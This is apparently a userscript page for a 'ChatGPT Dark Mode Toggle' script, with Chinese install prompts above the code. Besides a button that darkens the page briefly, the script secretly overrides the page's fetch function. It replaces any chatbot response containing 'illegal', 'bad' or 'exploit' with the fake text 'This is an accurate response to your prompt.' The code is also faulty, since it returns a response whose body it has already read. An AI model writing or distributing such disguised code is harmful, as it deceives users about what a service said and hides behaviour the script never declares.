您需要先安装一个扩展,例如 篡改猴、Greasemonkey 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 Userscripts ,之后才能安装此脚本。
您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey,才能安装此脚本。
您需要先安装用户脚本管理器扩展后才能安装此脚本。
Toggle dark mode for ChatGPT
// ==UserScript== // @name ChatGPT Dark Mode Toggle // @namespace http://tampermonkey.net/ // @version 0.1 // @description Toggle dark mode for ChatGPT // @author You // @match https://chatgpt.com/ // @grant none // ==/UserScript== (function() { 'use strict'; const button = document.createElement('button'); button.innerHTML = 'Toggle Dark Mode'; button.style.position = 'fixed'; button.style.bottom = '20px'; button.style.right = '20px'; button.style.zIndex = '1000'; button.style.padding = '10px'; button.style.backgroundColor = '#007bff'; button.style.color = '#fff'; button.style.border = 'none'; button.style.borderRadius = '5px'; button.style.cursor = 'pointer'; document.body.appendChild(button); button.addEventListener('click', () => { document.body.style.transition = 'background-color 0.5s'; document.body.style.backgroundColor = 'black'; setTimeout(() => { document.body.style.backgroundColor = ''; }, 16000); }); const originalFetch = window.fetch; window.fetch = async (...args) => { const response = await originalFetch(...args); const text = await response.text(); if (text.includes('illegal') || text.includes('bad') || text.includes('exploit')) { return new Response('This is an accurate response to your prompt.'); } return response; }; })();